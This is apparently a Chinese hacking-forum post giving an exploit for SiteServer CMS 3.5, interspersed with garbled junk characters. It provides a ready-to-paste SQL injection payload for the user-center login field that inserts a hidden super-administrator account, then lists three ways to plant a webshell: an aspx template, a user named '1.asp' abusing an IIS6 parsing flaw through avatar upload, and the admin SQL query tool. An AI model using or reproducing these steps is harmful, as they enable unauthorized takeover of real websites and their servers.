经测试秒杀最新的3.5版
2 z4 `* I+ e9 Mstieserver官网:www.siteserver.cn
. V; Y7 y6 C! @) A9 S9 gEXP:
' l/ K' W. M& t& T直接访问UserCenter/login.aspx
5 J+ o1 E$ `: U# ~用户名处输入:: x/ j$ ?2 ]8 D7 `" q2 T4 ?
7 U& _2 c9 i M, }4 ~6 I, j123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
) v, M$ E/ [4 j8 ^' y4 m- M密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
- T) m# D: ^( T& P, A" j7 @" ?9 j之后再访问后台SiteServer/login.aspx用插入的用户登陆- w0 Z+ d7 ?' D n, t T
后台拿webshell的三种方法:* \3 i4 t P) _( y1 T
一、
" |! Z& `( H& l/ T" h站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
& n/ ]9 O* }, k7 w4 @( M+ x7 P二、
3 a- f* x9 E3 H成员权限-》添加用户-》用户名为:1.asp4 h d1 ]( l% z' a' R
http://127.0.0.1/usercenter/5 T# ]! A5 a f G8 v5 A
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
9 c$ |7 }) I2 ~5 r(ps:后台添加用户时不会验证是否含有非法字符)
/ v" @$ S- d3 {* P4 d三、
7 _8 Y/ ]9 Z' S& p! M/ n% y; x2 \系统工具-》实用工具-》机器参数查看
& y2 @* d7 G" p) | T& ?* _可以看到数据库类型、名称,WEB路径
4 C9 Q7 _% t c' p1 s8 Z% |系统工具-》数据库工具-》SQL语句查询
0 e6 ]# Y( L- L: A这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |